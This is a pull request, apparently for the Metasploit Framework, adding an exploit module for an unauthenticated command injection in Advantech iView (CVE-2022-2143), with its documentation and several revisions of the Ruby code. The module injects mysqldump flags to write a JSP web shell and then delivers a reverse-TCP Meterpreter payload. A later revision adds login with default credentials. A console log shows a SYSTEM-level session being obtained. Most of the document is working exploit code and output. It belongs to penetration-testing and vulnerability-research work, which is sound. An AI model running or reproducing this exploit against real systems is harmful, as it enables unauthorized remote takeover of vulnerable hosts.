### PR TITLE
Add exploit module for CVE-2022-2143

### DIFF
--- a/documentation/modules/exploit/windows/http/advantech_iview_networkservlet_cmd_inject.md
+++ b/documentation/modules/exploit/windows/http/advantech_iview_networkservlet_cmd_inject.md
@@ -1,0 +1,71 @@
+## Vulnerable Application
+
+Versions of Advantech iView software below `5.7.04.6469` are vulnerable to
+an unauthenticated command injection vulnerability via the `NetworkServlet` endpoint.
+The database backup functionality passes a user-controlled parameter, `backup_file`
+to the `mysqldump` command. The sanitization functionality only tests for SQL injection
+attempts and directory traversal, so leveraging the `-r` and `-w` `mysqldump` flags
+permits exploitation. The command injection vulnerability is used to write a
+payload on the target and achieve remote code execution as NT AUTHORITY\SYSTEM.
+
+A vulnerable version can be installed from [here](https://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-26RVVS9).
+
+Other versions of the software can be found [here](https://www.advantech.tw/support/details/firmware?id=1-HIPU-183).
+
+### Installation Instructions
+
+Distributed with the installer is a PDF containing detailed installation instructions
+for the software. Once the installation has finished, you may have issues getting the
+Tomcat service to start. If that's the case, follow the steps below (pulled from advantech_iview_unauth_rce.md):
+
+  1. Copy the msvcr100.dll file from C:\Program Files (x86)\Java\jre7\bin to C:\Program Files (x86)\iView\Apache Software Foundation\Tomcat6.0\bin.
+  2. Restart the "Apache Tomcat 6" service. 1 At this point, the application should be listening on port 8080 and no additional configuration is necessary.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/http/advantech_iview_networkservlet_cmd_inject`
+4. Do: `set RHOST <ip>`
+5. Do: `run`
+6. You should get a meterpreter session.
+
+## Options
+
+## Scenarios
+
+### Advantech iView Webserver `v5.7.04.6425` on Windows 10 21H2 x64
+
+```
+msf6 > use exploit/windows/http/advantech_iview_networkservlet_cmd_inject
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > set rhost 192.168.140.197
+rhost => 192.168.140.197
+msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Using URL: http://192.168.140.1:8080/QVp4zocvVZ9f
+[*] Client 192.168.140.197 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237) requested /QVp4zocvVZ9f
+[*] Sending payload to 192.168.140.197 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237)
+[*] Sending stage (200774 bytes) to 192.168.140.197
+[*] Command Stager progress - 100.00% done (125/125 bytes)
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.197:50152) at 2022-07-21 16:48:57 -0500
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'webapps\iView3\vQbGQrFe.jsp' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-04M9HG7
+OS              : Windows 10 (10.0 Build 19044).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```

--- a/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
+++ b/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
@@ -170,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res
 
     if target['Type'] == :win_dropper
-      execute_cmdstager(linemax: 150, nodelete: true)
+      execute_cmdstager
     else
       execute_command(payload.encoded)
     end

--- a/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
+++ b/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
@@ -39,12 +39,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Platform' => [ 'win' ],
         'Privileged' => true,
-        'Arch' => [ ARCH_X64, ARCH_CMD ],
+        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
         'Targets' => [
           [
             'Windows Dropper',
             {
-              'Arch' => ARCH_X64,
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
               'Type' => :win_dropper,
               'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'vbs' ],
               'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
@@ -90,10 +90,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     res = send_db_backup_request('')
+    return CheckCode::Detected('Failed to receive response from backup request') unless res
 
     # The patch added auth as a requirement for
     # accessing the NetworkServlet endpoint
-    return CheckCode::Appears unless res&.body =~ /ERROR:\s+User\s+Not\sLogin/
+    return CheckCode::Appears unless res.body =~ /ERROR:\s+User\s+Not\sLogin/
 
     CheckCode::Detected
   end

--- a/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
+++ b/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3']),
         OptString.new('USERNAME', [ false, 'The user name to authenticate with', 'admin']),
-        OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'admin'])
+        OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'password'])
       ]
     )
   end

--- a/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
+++ b/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
@@ -71,7 +71,9 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8080),
-        OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3'])
+        OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3']),
+        OptString.new('USERNAME', [ false, 'The user name to authenticate with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'admin'])
       ]
     )
   end
@@ -93,15 +95,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # The patch added auth as a requirement for
     # accessing the NetworkServlet endpoint
-    return CheckCode::Appears unless res.body =~ /ERROR:\s+User\s+Not\sLogin/
+    if res.body =~ /ERROR:\s+User\s+Not\sLogin/
+      @needs_auth = true
+      print_status('Vulnerability is present, though authentication is required.')
+    end
 
-    CheckCode::Detected
+    CheckCode::Appears
   end
 
   def send_db_backup_request(filename)
     send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
+      'keep_cookies' => true,
       'vars_post' =>
       {
         'page_action_type' => 'backupDatabase',
@@ -150,6 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, jsp_filename),
+      'keep_cookies' => true,
       'vars_get' =>
       {
         bin_param => 'cmd.exe',
@@ -159,7 +166,50 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  def iview_authenticate
+    res = send_request_cgi!(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Login page not found') unless res && res.body.include?('loginWindow')
+    vprint_good('Successfully accessed the login page')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'CommandServlet'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'page_action_service' => 'UserServlet',
+        'page_action_type' => 'login',
+        'user_name' => datastore['USERNAME'],
+        'user_password' => datastore['PASSWORD'],
+        'use_ldap' => 'false',
+        'data' => ''
+      }
+    )
+
+    unless res && res.body.include?('Success')
+      fail_with(Failure::BadConfig, 'Authentication failed. Credentials likely incorrect.')
+    end
+    vprint_good('Authentication successful!')
+  end
+
+  def need_auth?
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'NetworkServlet')
+    )
+    return false unless res
+
+    !!(res.body =~ /ERROR:\s+User\s+Not\sLogin/)
+  end
+
   def exploit
+    if @needs_auth || need_auth?
+      iview_authenticate
+    end
+
     jsp_code = format_jsp
 
     sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"

--- a/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
+++ b/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::CmdStager
-  include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -165,7 +164,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"
     full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""
-    register_file_for_cleanup("webapps\\iView3\\#{jsp_filename}")
 
     res = send_db_backup_request(full_cmd)
     fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res
@@ -175,5 +173,17 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       execute_command(payload.encoded)
     end
+  end
+
+  def on_new_session(session)
+    super
+
+    path = "webapps\\iView3\\#{jsp_filename}"
+    if session.fs.file.exist?(path)
+      vprint_status("Deleting #{jsp_filename}...")
+      session.fs.file.rm(path)
+    end
+  rescue Rex::Post::Meterpreter::RequestError => e
+    print_error("Failed to delete #{jsp_filename} : #{e}")
   end
 end

--- a/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
+++ b/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -218,22 +219,12 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_db_backup_request(full_cmd)
     fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res
 
+    path = "webapps\\iView3\\#{jsp_filename}"
+    register_file_for_cleanup(path)
     if target['Type'] == :win_dropper
       execute_cmdstager
     else
       execute_command(payload.encoded)
     end
-  end
-
-  def on_new_session(session)
-    super
-
-    path = "webapps\\iView3\\#{jsp_filename}"
-    if session.fs.file.exist?(path)
-      vprint_status("Deleting #{jsp_filename}...")
-      session.fs.file.rm(path)
-    end
-  rescue Rex::Post::Meterpreter::RequestError => e
-    print_error("Failed to delete #{jsp_filename} : #{e}")
   end
 end

--- a/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
+++ b/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
@@ -44,16 +45,26 @@ class MetasploitModule < Msf::Exploit::Remote
             'Windows Dropper',
             {
               'Arch' => ARCH_X64,
+              'Type' => :win_dropper,
+              'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'vbs' ],
               'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }
             }
           ]
         ],
         'DisclosureDate' => '2022-06-28',
         'DefaultTarget' => 0,
         'Notes' => {
-          'Stability' => [],
-          'Reliability' => [],
-          'SideEffects' => []
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
         }
       )
     )
@@ -99,24 +110,69 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def format_jsp(param)
-    nums = []
-    param.each_char { |c| nums << c.ord }
-    nums = nums.join(',')
+  def format_jsp
+    bin_nums = []
+    arg_nums = []
+    flag_nums = []
 
-    "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[]{#{nums}}))).start()).getInputStream()))%>"
+    bin_param.each_char { |c| bin_nums << c.ord }
+    bin_nums = bin_nums.join(',')
+    arg_param.each_char { |c| arg_nums << c.ord }
+    arg_nums = arg_nums.join(',')
+    flag_param.each_char { |c| flag_nums << c.ord }
+    flag_nums = flag_nums.join(',')
+
+    '<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((' \
+    'new ProcessBuilder(request.getParameter(' \
+    "new java.lang.String(new byte[]{#{bin_nums}}))," \
+    "request.getParameter(new java.lang.String(new byte[]{#{flag_nums}}))," \
+    "request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())" \
+    '.getInputStream()))%>'
+  end
+
+  def flag_param
+    @flag_param ||= Rex::Text.rand_text_alpha(3..8)
+  end
+
+  def arg_param
+    @arg_param ||= Rex::Text.rand_text_alpha(3..8)
+  end
+
+  def bin_param
+    @bin_param ||= Rex::Text.rand_text_alpha(3..8)
+  end
+
+  def jsp_filename
+    @jsp_filename ||= "#{Rex::Text.rand_text_alpha(5..12)}.jsp"
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, jsp_filename),
+      'vars_get' =>
+      {
+        bin_param => 'cmd.exe',
+        flag_param => '/c',
+        arg_param => cmd
+      }
+    )
   end
 
   def exploit
-    param = Rex::Text.rand_text_alpha(3..8)
-    jsp_code = format_jsp(param)
+    jsp_code = format_jsp
 
     sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"
-    jsp_filename = "#{Rex::Text.rand_text_alpha(5..12)}.jsp"
     full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""
-    register_file_for_cleanup("webapps/iView3/#{jsp_filename}")
+    register_file_for_cleanup("webapps\\iView3\\#{jsp_filename}")
 
     res = send_db_backup_request(full_cmd)
     fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res
+
+    if target['Type'] == :win_dropper
+      execute_cmdstager(linemax: 150, nodelete: true)
+    else
+      execute_command(payload.encoded)
+    end
   end
 end

--- a/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
+++ b/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb
@@ -1,0 +1,122 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Advantech iView NetworkServlet Command Injection',
+        'Description' => %q{
+          Versions of Advantech iView software below `5.7.04.6469` are
+          vulnerable to an unauthenticated command injection vulnerability
+          via the `NetworkServlet` endpoint.
+          The database backup functionality passes a user-controlled parameter,
+          `backup_file` to the `mysqldump` command. The sanitization functionality only
+          tests for SQL injection attempts and directory traversal, so leveraging the
+          `-r` and `-w` `mysqldump` flags permits exploitation.
+          The command injection vulnerability is used to write a payload on the target
+          and achieve remote code execution as NT AUTHORITY\SYSTEM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'rgod', # Vulnerability discovery
+          'y4er', # PoC
+          'Shelby Pace' # Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/'],
+          [ 'CVE', '2022-2143']
+        ],
+        'Platform' => [ 'win' ],
+        'Privileged' => true,
+        'Arch' => [ ARCH_X64, ARCH_CMD ],
+        'Targets' => [
+          [
+            'Windows Dropper',
+            {
+              'Arch' => ARCH_X64,
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DisclosureDate' => '2022-06-28',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi!(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+
+    return CheckCode::Unknown('Failed to receive a response from the application') unless res
+
+    unless res.body.include?('iView')
+      return CheckCode::Safe('No confirmation that target is Advantech iView')
+    end
+
+    res = send_db_backup_request('')
+
+    # The patch added auth as a requirement for
+    # accessing the NetworkServlet endpoint
+    return CheckCode::Appears unless res&.body =~ /ERROR:\s+User\s+Not\sLogin/
+
+    CheckCode::Detected
+  end
+
+  def send_db_backup_request(filename)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
+      'vars_post' =>
+      {
+        'page_action_type' => 'backupDatabase',
+        'backup_filename' => filename
+      }
+    )
+  end
+
+  def format_jsp(param)
+    nums = []
+    param.each_char { |c| nums << c.ord }
+    nums = nums.join(',')
+
+    "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[]{#{nums}}))).start()).getInputStream()))%>"
+  end
+
+  def exploit
+    param = Rex::Text.rand_text_alpha(3..8)
+    jsp_code = format_jsp(param)
+
+    sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"
+    jsp_filename = "#{Rex::Text.rand_text_alpha(5..12)}.jsp"
+    full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""
+    register_file_for_cleanup("webapps/iView3/#{jsp_filename}")
+
+    res = send_db_backup_request(full_cmd)
+    fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res
+  end
+end


### PR DESCRIPTION
## Description

Versions of Advantech iView software below `5.7.04.6469` are vulnerable to
an unauthenticated command injection vulnerability via the `NetworkServlet` endpoint.
The database backup functionality passes a user-controlled parameter, `backup_file`
to the `mysqldump` command. The sanitization functionality only tests for SQL injection
attempts and directory traversal, so leveraging the `-r` and `-w` `mysqldump` flags
permits exploitation. The command injection vulnerability is used to write a
payload on the target and achieve remote code execution as NT AUTHORITY\SYSTEM.

## Verification

- [ ] Install the application
- [ ] Start msfconsole
- [ ] Do: `use exploit/windows/http/advantech_iview_networkservlet_cmd_inject`
- [ ] Do: `set RHOST <ip>`
- [ ] Do: `run`
- [ ] You should get a meterpreter session.

## Scenarios

```
msf6 > use exploit/windows/http/advantech_iview_networkservlet_cmd_inject
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > set rhost 192.168.140.197
rhost => 192.168.140.197
msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(windows/http/advantech_iview_networkservlet_cmd_inject) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.140.1:8080/QVp4zocvVZ9f
[*] Client 192.168.140.197 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1
[*] Sending payload to 192.168.140.197 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell
[*] Sending stage (200774 bytes) to 192.168.140.197
[*] Command Stager progress - 100.00% done (125/125 bytes)
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.197:50152) at 2022-07-21 16:48:57 -050
[*] Server stopped.
[!] This exploit may require manual cleanup of 'webapps\iView3\vQbGQrFe.jsp' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-04M9HG7
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```